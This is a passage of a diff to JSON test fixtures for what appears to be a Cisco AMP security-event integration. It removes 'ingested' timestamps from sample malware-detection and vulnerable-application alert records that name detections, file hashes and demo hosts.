"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":170000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605485\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -2254,7 +2231,6 @@ ], "code": "1090519054", "id": "6533669667045638000", - "ingested": "2022-02-02T05:52:24.688966263Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669667045638000,\"timestamp\":1610706059,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-15T10:20:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669667045638188\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -2353,7 +2329,6 @@ ], "code": "1107296279", "id": "15210587194928", - "ingested": "2022-02-02T05:52:24.688967093Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15210587194928,\"timestamp\":1610706000,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:20:00+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610706000,\"start_date\":\"2021-01-15T10:20:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f5:8f:96:c3:53:1c\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"firefox.exe\",\"identity\":{\"sha256\":\"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}},\"vulnerabilities\":[{\"name\":\"Mozilla Firefox\",\"version\":\"41.0\",\"cve\":\"CVE-2015-7204\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204\"}]}}", "severity": 1, @@ -2434,7 +2409,6 @@ ], "code": "1090519054", "id": "6533669409347600000", - "ingested": "2022-02-02T05:52:24.688967920Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":257000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -2524,7 +2498,6 @@ ], "code": "1090519054", "id": "6533669409347600000", - "ingested": "2022-02-02T05:52:24.688968731Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":240000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -2610,7 +2583,6 @@ ], "code": "1090519054", "id": "6533669405052633000", - "ingested": "2022-02-02T05:52:24.688969541Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669405052633000,\"timestamp\":1610705998,\"timestamp_nanoseconds\":847000000,\"date\":\"2021-01-15T10:19:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669405052633129\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -2696,7 +2668,6 @@ ], "code": "1090519054", "id": "6533669147354595000", - "ingested": "2022-02-02T05:52:24.688970348Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":375000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595368\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -2786,7 +2757,6 @@ ], "code": "1090519054", "id": "6533669147354595000", - "ingested": "2022-02-02T05:52:24.688971154Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":360000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -2872,7 +2842,6 @@ ], "code": "1090519054", "id": "6533669143059628000", - "ingested": "2022-02-02T05:52:24.688971979Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669143059628000,\"timestamp\":1610705937,\"timestamp_nanoseconds\":968000000,\"date\":\"2021-01-15T10:18:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669143059628070\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -2958,7 +2927,6 @@ ], "code": "1090519054", "id": "6176259286289613000", - "ingested": "2022-02-02T05:52:24.688972794Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259286289613000,\"timestamp\":1610705905,\"timestamp_nanoseconds\":669000000,\"date\":\"2021-01-15T10:18:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259286289612895\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 @@ -3038,7 +3006,6 @@ ], "code": "1090519054", "id": "6176259234750005000", - "ingested": "2022-02-02T05:52:24.688973608Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259234750005000,\"timestamp\":1610705893,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-15T10:18:13+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259234750005342\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 @@ -3118,7 +3085,6 @@ ], "code": "1090519054", "id": "6176259183210398000", - "ingested": "2022-02-02T05:52:24.688974441Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259183210398000,\"timestamp\":1610705881,\"timestamp_nanoseconds\":645000000,\"date\":\"2021-01-15T10:18:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259183210397789\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 @@ -3202,7 +3168,6 @@ ], "code": "1090519054", "id": "6180335966167761000", - "ingested": "2022-02-02T05:52:24.688975468Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180335966167761000,\"timestamp\":1610705878,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-15T10:17:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6180335966167760897\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Fax.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\Documents\\\\Fax\\\\Fax.exe\",\"identity\":{\"sha256\":\"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc\",\"sha1\":\"f9b02ad8d25157eebdb284631ff646316dc606d5\",\"md5\":\"b2e15a06b0cca8a926c94f8a8eae3d88\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "severity": 2 @@ -3301,7 +3266,6 @@ ], "code": "1090519054", "id": "6533668885361590000", - "ingested": "2022-02-02T05:52:24.688976288Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -3391,7 +3355,6 @@ ], "code": "1090519054", "id": "6533668885361590000", - "ingested": "2022-02-02T05:52:24.688977153Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":653000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -3477,7 +3440,6 @@ ], "code": "1090519054", "id": "6533668885361590000", - "ingested": "2022-02-02T05:52:24.688977970Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 @@ -3563,7 +3525,6 @@ ], "code": "1090519054", "id": "6176259135965757000", - "ingested": "2022-02-02T05:52:24.688978802Z", "kind": "alert", "original": 